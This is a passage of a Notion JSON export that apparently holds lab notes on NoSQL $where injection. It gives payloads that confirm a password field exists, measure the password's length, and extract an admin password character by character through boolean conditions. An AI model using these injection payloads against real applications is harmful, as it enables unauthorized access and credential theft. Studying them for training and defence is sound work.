text"},"archived":false},{"object":"block","id":"251dc9c5-3059-807b-9d0e-dd3a26139a2a","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8046-9beb-d97e12f42ea7","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password!=''\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-804f-8642-f849dbecbb1a","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Test non-existent field","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Test non-existent field","href":null},{"type":"text","text":{"content":" (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (","href":null},{"type":"text","text":{"content":"foo","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"foo","href":null},{"type":"text","text":{"content":"):","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"):","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-807f-a28c-f15af8d4269f","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.foo!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.foo!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b0-b453-f544cb1e2bcb","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e0-9c0f-d7e767ffcff8","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.foo!=''\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.foo!=''\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8007-8b06-f612eb2a8155","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If ","href":null},{"type":"text","text":{"content":"password behaves like username","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"password behaves like username","href":null},{"type":"text","text":{"content":" (normal response) → it exists.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (normal response) → it exists.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e5-9ce8-d27d92f6b78b","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If it behaves like foo (error or different response) → it doesn’t exist.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If it behaves like foo (error or different response) → it doesn’t exist.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8072-8f9b-f8ed76d50ffb","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Optional:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Optional:","href":null},{"type":"text","text":{"content":" Automate this with a dictionary of fields:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Automate this with a dictionary of fields:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8010-9c36-cf0f06ab2c6e","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.!='","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.!='","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80da-bd0a-e9a4a420eb01","parent":{"type":"block_id","block_id":"251dc9c5-3059-8081-9a30-e511c5f4067c"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:32:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Repeat for ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Repeat for ","href":null},{"type":"text","text":{"content":"email","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"email","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"token","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"token","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"apikey","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"apikey","href":null},{"type":"text","text":{"content":", etc.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", etc.","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-809b-bbb7-c334e68c70c3","parent":{"type":"block_id","block_id":"251dc9c5-3059-8063-882c-d983598d284d"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 3 – Determine Password Length","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 3 – Determine Password Length","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8032-900a-dbe97a669ebb","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" Find how many characters the password has before extracting it.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Find how many characters the password has before extracting it.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8016-ab07-e7acad6e16ce","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payload (check if password length < 15):","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payload (check if password length < 15):","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8026-8222-c3dd955f49f0","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"administrator' && this.password.length < 15 || 'a'=='b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"administrator' && this.password.length < 15 || 'a'=='b","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80bc-b26b-dd6689ba951d","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c5-9d24-f4cb77ab3ba6","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'administrator' && this.password.length < 15 || 'a'=='b'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'administrator' && this.password.length < 15 || 'a'=='b'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-804a-9afb-dc17a4946928","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected Response:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected Response:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-806c-8a87-cc8933235619","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If true → password has fewer than 15 characters.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If true → password has fewer than 15 characters.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d6-97ec-e1f35baf62c2","parent":{"type":"block_id","block_id":"251dc9c5-3059-809b-bbb7-c334e68c70c3"},"created_time":"2025-08-16T12:35:00.000Z","last_edited_time":"2025-08-16T12:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If false → test with other values until true.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If false → test with other values until true.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8057-af12-e24ad21c9adc","parent":{"type":"block_id","block_id":"251dc9c5-3059-8063-882c-d983598d284d"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 3 — Extract data character by character","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 3 — Extract data character by character","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8036-a9c4-e93d9c2d134b","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Once you confirm the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Once you confirm the ","href":null},{"type":"text","text":{"content":"password","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"password","href":null},{"type":"text","text":{"content":" field exists, you can extract it in small pieces.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" field exists, you can extract it in small pieces.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80a2-914b-d7a60fb173e2","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Check first character of password:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Check first character of password:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8073-a38f-e2cb4c3d300c","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password[0] == 'a' || 'a'=='b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password[0] == 'a' || 'a'=='b","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-8071-8d54-cf25d5541cc3","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8060-adf6-df32ed87b2a8","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password[0] == 'a' || 'a'=='b'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password[0] == 'a' || 'a'=='b'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-807c-8b5e-fd744e1d6545","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If the response is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the response is ","href":null},{"type":"text","text":{"content":"true","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"true","href":null},{"type":"text","text":{"content":" → first character is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" → first character is ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8021-9f54-cbedc9206864","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If not, try ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If not, try ","href":null},{"type":"text","text":{"content":"b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"b","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"c","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"c","href":null},{"type":"text","text":{"content":", … until you find the match.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", … until you find the match.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8080-8cbd-cf6fe67d04a2","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"numbered_list_item","numbered_list_item":{"rich_text":[{"type":"text","text":{"content":"Repeat for each position:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Repeat for each position:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-805f-98fa-ffc05688c330","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password[1] == 'x' || 'a'=='b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password[1] == 'x' || 'a'=='b","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80a0-bacd-c222a7609bb4","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Query:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80ff-a076-dedf73cdea08","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password[1] == 'x' || 'a'=='b'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password[1] == 'x' || 'a'=='b'\"}","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8068-90a9-ce9c4cae6864","parent":{"type":"block_id","block_id":"251dc9c5-3059-8057-af12-e24ad21c9adc"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Keep incrementing the index (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Keep incrementing the index (","href":null},{"type":"text","text":{"content":"[2]","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"[2]","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"[3]","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"[3]","href":null},{"type":"text","text":{"content":", etc.) until you extract the whole password.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", etc.) until you extract the whole password.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8010-afa9-dee76789f701","parent":{"type":"block_id","block_id":"251dc9c5-3059-8063-882c-d983598d284d"},"created_time":"2025-08-16T11:28:00.000Z","last_edited_time":"2025-08-16T11:31:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 4 — Use match() for broader checks","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 4 — Use match() for broader 